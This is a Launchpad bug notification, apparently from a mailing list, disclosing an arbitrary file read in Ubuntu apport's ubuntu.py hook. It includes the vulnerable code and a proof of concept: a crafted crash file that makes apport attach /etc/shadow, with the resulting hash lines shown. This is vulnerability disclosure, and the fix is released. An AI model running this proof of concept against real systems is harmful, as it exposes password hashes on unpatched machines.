[Touch-packages] [Bug 1934308] Re: Arbitrary file read in general hook (ubuntu.py)

Wed, 12 Apr 2023 08:11:04 -0700 

** Changed in: apport (Ubuntu)
   Importance: Undecided => Critical

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1934308

Title:
  Arbitrary file read in general hook (ubuntu.py)

Status in Apport:
  Fix Released
Status in apport package in Ubuntu:
  Fix Released

Bug description:
  While reviewing Apport's general hooks it was found that the hook
  `apport/general-hooks/ubuntu.py` includes user controlled files when
  handling `emacs`-related reports:

  if report['Package'] in ['emacs22', 'emacs23', 'emacs-snapshot', 'xemacs21']:
      # emacs add-on packages trigger byte compilation, which might fail
      # we are very interested in reading the compilation log to determine
      # where to reassign this report to
      regex = r'^!! Byte-compilation for x?emacs\S+ failed!'
      if attachment in report and re.search(regex, log_file, re.MULTILINE):
          for line in log_file.split('\n'):
              m = re.search(r'^!! and attach the file (\S+)', line)  # [0]
              if m:
                  path = m.group(1)
                  apport.hookutils.attach_file_if_exists(report, path)  # [1]

  After using a regular expression to extract the file to attach [0],
  the extracted file subsequently gets attached to the report file [1].

  With automatic crash reporting enabled the following PoC (tested on
  20.04/21.04 Desktop) includes the file `/etc/shadow` in the respective
  report file:

  cat << EOF > /var/crash/poc.crash
  ProblemType: Package
  ExecutablePath: /poc
  Package: emacs22
  DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
   !! and attach the file /etc/shadow
  EOF

  grep -A5 DpkgTerminal /var/crash/poc.crash
  DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
   !! and attach the file /etc/shadow
  .etc.shadow:
   root:!:18393:0:99999:7:::
   daemon:*:18375:0:99999:7:::
   bin:*:18375:0:99999:7:::

  Best regards!

To manage notifications about this bug go to:
https://bugs.launchpad.net/apport/+bug/1934308/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Reply via email to